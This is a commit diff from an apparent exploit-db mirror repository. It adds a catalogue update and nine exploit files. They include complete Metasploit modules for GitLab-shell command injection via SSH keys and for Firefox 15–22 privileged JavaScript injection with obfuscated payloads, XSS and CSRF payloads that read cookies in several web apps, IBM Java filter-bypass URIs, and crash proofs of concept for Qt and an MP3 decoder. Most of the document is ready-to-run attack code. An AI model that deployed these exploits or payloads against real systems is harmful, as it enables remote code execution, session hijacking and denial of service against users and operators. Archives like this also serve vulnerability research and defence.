bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

Updated 08_21_2014

Browse source
This commit is contained in:
Offensive Security 2014-08-21 04:39:24 +00:00
parent 98096fa276
commit 266ec628d7
10 changed files with 470 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -30949,3 +30949,12 @@ id,file,description,date,author,platform,type,port
34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 Cross Site Request Forgery Vulnerability",2010-07-20,anonymous,windows,dos,0
34360,platforms/multiple/dos/34360.txt,"Monolith Lithtech Game Engine - Memory Corruption Vulnerability",2010-07-21,"Luigi Auriemma",multiple,dos,0
34361,platforms/hardware/webapps/34361.txt,"Tenda A5s Router 3.02.05_CN - Authentication Bypass Vulnerability",2014-08-18,zixian,hardware,webapps,80
34362,platforms/linux/remote/34362.rb,"Gitlab-shell Code Execution",2014-08-19,metasploit,linux,remote,443
34363,platforms/multiple/remote/34363.rb,"Firefox toString console.time Privileged Javascript Injection",2014-08-19,metasploit,multiple,remote,0
34364,platforms/linux/dos/34364.html,"Qt <= 4.6.3 'QTextEngine::LayoutData::reallocate()' Memory Corruption Vulnerability",2010-07-13,D4rk357,linux,dos,0
34365,platforms/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 Multiple Cross Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",php,webapps,0
34366,platforms/php/webapps/34366.txt,"Stratek Web Design Twilight CMS 4.0 'calendar' Cross Site Scripting Vulnerability",2009-11-02,"Vladimir Vorontsov",php,webapps,0
34367,platforms/php/webapps/34367.txt,"Piwigo 2.0 'comments.php' Multiple Cross Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",php,webapps,0
34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder '.mp3' File Remote Buffer Overflow Vulnerability",2009-10-31,4m!n,windows,dos,0
34369,platforms/multiple/remote/34369.txt,"IBM Java UTF8 Byte Sequences Security Bypass Vulnerability",2010-07-23,IBM,multiple,remote,0
34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 'wsnavigator' Cross Site Scripting Vulnerability",2010-07-23,"Alexandr Polyakov",jsp,webapps,0

Can't render this file because it is too large.

9
platforms/jsp/webapps/34370.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41925/info
SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
SAP Netweaver 6.4 through 7.0 is vulnerable; other versions may also be affected.
https://www.example.com/wsnavigator/jsps/explorer/help.jsp?title=Test">AAAAAAAA<script>alert(&#039;XSS&#039;)</script>

30
platforms/linux/dos/34364.html Executable file
View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/41873/info
Qt is prone to a remote memory-corruption vulnerability.
Successful exploits may allow the attacker to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
<html>
<head>
<title>Arora browser Remote Denial fo Service </title>
<body bgcolor="black">
<script type="text/javascript">
function garbage() {
var buffer = "";
for (var i = 0; i < 8000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 8000; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2>==> <a href="javascript:garbage();">CLICK HERE</a></font> <==</h2>
</body>
</html>

238
platforms/linux/remote/34362.rb Executable file
View file

@ -0,0 +1,238 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Gitlab-shell Code Execution',
'Description' => %q(
This module takes advantage of the addition of authorized
ssh keys in the gitlab-shell functionality of Gitlab. Versions
of gitlab-shell prior to 1.7.4 used the ssh key provided directly
in a system call resulting in a command injection vulnerability. As
this relies on adding an ssh key to an account valid credentials
are required to exploit this vulnerability.
),
'Author' =>
[
'Brandon Knight'
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/'],
['CVE', '2013-4490']
],
'Platform' => 'linux',
'Targets' =>
[
[ 'Linux',
{
'Platform' => 'linux',
'Arch' => ARCH_X86
}
],
[ 'Linux (x64)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64
}
],
[ 'Unix (CMD)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'RequiredCmd' => 'openssl perl python'
},
'BadChars' => "\x22"
}
}
],
[ 'Python',
{
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Payload' =>
{
'BadChars' => "\x22"
}
}
]
],
'CmdStagerFlavor' => %w( bourne printf ),
'DisclosureDate' => 'Nov 4 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new('USERNAME', [true, 'The username to authenticate as', 'root']),
OptString.new('PASSWORD', [true, 'The password for the specified username', '5iveL!fe']),
OptString.new('TARGETURI', [true, 'The path to Gitlab', '/'])
], self.class)
end
def exploit
login
case target['Platform']
when 'unix'
execute_command(payload.encoded)
when 'python'
execute_command("python -c \\\"#{payload.encoded}\\\"")
when 'linux'
execute_cmdstager(temp: './', linemax: 2800)
end
end
def execute_command(cmd, _opts = {})
key_id = add_key(cmd)
delete_key(key_id)
end
def check
res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))
if res && res.body && res.body.include?('GitLab')
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unknown
end
end
def login
username = datastore['USERNAME']
password = datastore['PASSWORD']
signin_page = normalize_uri(target_uri.path.to_s, 'users', 'sign_in')
# Get a valid session cookie and authenticity_token for the next step
res = send_request_cgi(
'method' => 'GET',
'cookie' => 'request_method=GET',
'uri' => signin_page
)
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res
local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
if res.body.include? 'user[email]'
@gitlab_version = 5
user_field = 'user[email]'
else
@gitlab_version = 7
user_field = 'user[login]'
end
# Perform the actual login and get the newly assigned session cookie
res = send_request_cgi(
'method' => 'POST',
'cookie' => local_session_cookie,
'uri' => signin_page,
'vars_post' =>
{
'utf8' => "\xE2\x9C\x93",
'authenticity_token' => auth_token,
"#{user_field}" => username,
'user[password]' => password,
'user[remember_me]' => 0
}
)
fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302
@session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
fail_with(Failure::NoAccess, "#{peer} - Unable to get session cookie") if @session_cookie.nil?
end
def add_key(cmd)
if @gitlab_version == 5
@key_base = normalize_uri(target_uri.path.to_s, 'keys')
else
@key_base = normalize_uri(target_uri.path.to_s, 'profile', 'keys')
end
# Perform an initial request to get an authenticity_token so the actual
# key addition can be done successfully.
res = send_request_cgi(
'method' => 'GET',
'cookie' => "request_method=GET; #{@session_cookie}",
'uri' => normalize_uri(@key_base, 'new')
)
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
title = rand_text_alphanumeric(16)
key_info = rand_text_alphanumeric(6)
# Generate a random ssh key
key = OpenSSL::PKey::RSA.new 2048
type = key.ssh_type
data = [key.to_blob].pack('m0')
openssh_format = "#{type} #{data}"
# Place the payload in to the key information to perform the command injection
key = "#{openssh_format} #{key_info}';#{cmd}; echo '"
res = send_request_cgi(
'method' => 'POST',
'cookie' => "request_method=GET; #{@session_cookie}",
'uri' => @key_base,
'vars_post' =>
{
'utf8' => "\xE2\x9C\x93",
'authenticity_token' => auth_token,
'key[title]' => title,
'key[key]' => key
}
)
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
# Get the newly added key id so it can be used for cleanup
key_id = res.headers['Location'].split('/')[-1]
key_id
end
def delete_key(key_id)
res = send_request_cgi(
'method' => 'GET',
'cookie' => "request_method=GET; #{@session_cookie}",
'uri' => @key_base
)
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]
# Remove the key which was added to clean up after ourselves
res = send_request_cgi(
'method' => 'POST',
'cookie' => "#{@session_cookie}",
'uri' => normalize_uri("#{@key_base}", "#{key_id}"),
'vars_post' =>
{
'_method' => 'delete',
'authenticity_token' => auth_token
}
)
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
end
end

105
platforms/multiple/remote/34363.rb Executable file
View file

@ -0,0 +1,105 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/exploitation/jsobfu'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
autopwn_info({
:ua_name => HttpClients::FF,
:ua_minver => "15.0",
:ua_maxver => "22.0",
:javascript => true,
:rank => ExcellentRanking
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Firefox toString console.time Privileged Javascript Injection',
'Description' => %q{
This exploit gains remote code execution on Firefox 15-22 by abusing two separate
Javascript-related vulnerabilities to ultimately inject malicious Javascript code
into a context running with chrome:// privileges.
},
'License' => MSF_LICENSE,
'Author' => [
'moz_bug_r_a4', # discovered CVE-2013-1710
'Cody Crews', # discovered CVE-2013-1670
'joev' # metasploit module
],
'DisclosureDate' => "May 14 2013",
'References' => [
['CVE', '2013-1670'], # privileged access for content-level constructor
['CVE', '2013-1710'] # further chrome injection
],
'Targets' => [
[
'Universal (Javascript XPCOM Shell)', {
'Platform' => 'firefox',
'Arch' => ARCH_FIREFOX
}
],
[
'Native Payload', {
'Platform' => %w{ java linux osx solaris win },
'Arch' => ARCH_ALL
}
]
],
'DefaultTarget' => 0,
'BrowserRequirements' => {
:source => 'script',
:ua_name => HttpClients::FF,
:ua_ver => lambda { |ver| ver.to_i.between?(15, 22) }
}
))
register_options([
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
], self.class)
end
def on_request_exploit(cli, request, target_info)
send_response_html(cli, generate_html(target_info))
end
def generate_html(target_info)
key = Rex::Text.rand_text_alpha(5 + rand(12))
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
js = Rex::Exploitation::JSObfu.new(%Q|
var opts = #{JSON.unparse(opts)};
var key = opts['#{key}'];
var y = {}, q = false;
y.constructor.prototype.toString=function() {
if (q) return;
q = true;
crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex");
return 5;
};
console.time(y);
|)
js.obfuscate
%Q|
<!doctype html>
<html>
<body>
<script>
#{js}
</script>
#{datastore['CONTENT']}
</body>
</html>
|
end
end

12
platforms/multiple/remote/34369.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/41918/info
IBM Java is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input.
Successful exploits can allow attackers to bypass filtering mechanisms; this may aid in further attacks.
Versions prior to IBM Java SDK 1.4.2 SR13-FP6, Java SE 5.0.0-SR12, and Java SE 6.0.0-SR9 are vulnerable.
The following example URI's are available:
http://www.example.com/ctx/index%c0%aehtml
http://www.example.com/ctx/index.%c1%bfj%c1%bfs%c1%bfp%c1%bf

15
platforms/php/webapps/34365.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/41885/info
Claus Muus Spitfire is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Claus Muus Spitfire 1.0.336 is vulnerable; prior versions may also be affected.
http://www.example.com/site/cont_index.php?cms_id=PAGE_ID"><script>alert(document.cookie)</script>
<form action="http://www.example.com/cms//edit/tpl_element_settings_action.php" method="post" name="main" > <input type="hidden" name="action" value="save" /> <input type="hidden" name="value[description]" value='descr2"><script>alert(document.cookie)</script>' /> </form> <script> document.main.submit(); </script>
<form action="http://www.example.com/cms//edit/tpl_edit_action.php" method="post" name="main" > <input type="hidden" name="action" value="save" /> <input type="hidden" name="value[headline]" value='headl2<img src=x onerror=alert(234)>' /> <input type="hidden" name="winid" value="0" /> </form> <script> document.main.submit(); </script> Second code: <form action="http://www.example.com/cms//edit/tpl_edit_action.php" method="post" name="main" > <input type="hidden" name="action" value="value" /> <input type="hidden" name="tabid" value="headline" /> <input type="hidden" name="winid" value="0" /> </form> <script> document.main.submit(); </script>
<form action="http://www.example.com/cms/edit/tpl_backup_action.php" method="post" name="main" > <input type="hidden" name="action" value="message" /> <input type="hidden" name="text" value='help text<img src=x onerror=alert(document.cookie)>' /> </form> <script> document.main.submit(); </script>

9
platforms/php/webapps/34366.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41895/info
Twilight CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example URI is available:
http://www.example.com/news/?calendar = "; alert (" ONsec.ru% 20Russian% 20security% 20team \ n \ n "% 2Bdocument.cookie); / /

11
platforms/php/webapps/34367.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/41897/info
Piwigo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Piwigo 2.0.5 is vulnerable; other versions may also be affected.
http://www.example.com/comments.php?keyword=<script>alert(/Vulnerable/.source)</script>&since=
http://www.example.com/comments.php?author=<script>alert(/Vulnerable/.source)</script>&since=

32
platforms/windows/dos/34368.c Executable file
View file

@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/41912/info
MP3 to WAV Decoder is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed attacks will cause denial-of-service conditions.
/*
MP3 to WAV Decoder Local Crash PoC !
Discovered By ZAC003(4m!n)
Dl Link : http://www.mthreedev.com/setupmp3towav.exe
Greet Ciph3r for Help me !
*/
#include <stdio.h>
#include <windows.h>
#include <string.h>
#define overflow 13240
#define mp3 "zac003.mp3"
int main (int argc,char **argv){
char buffer[overflow];
FILE *Player;
printf("\n******************************************");
printf("\n* This Bug Discovered By ZAC003(4m!n) *");
printf("\n* Special Thank To Aria-Security.CoM *");
printf("\n* Greet Ciph3r for help me ! *");
printf("\n******************************************");
buffer[overflow] = 0;
Player = fopen(mp3,"w+");
fwrite(Player,sizeof(unsigned char),sizeof(buffer),Player);
fclose(Player);
printf("\n Successfully !!");
return 0;
}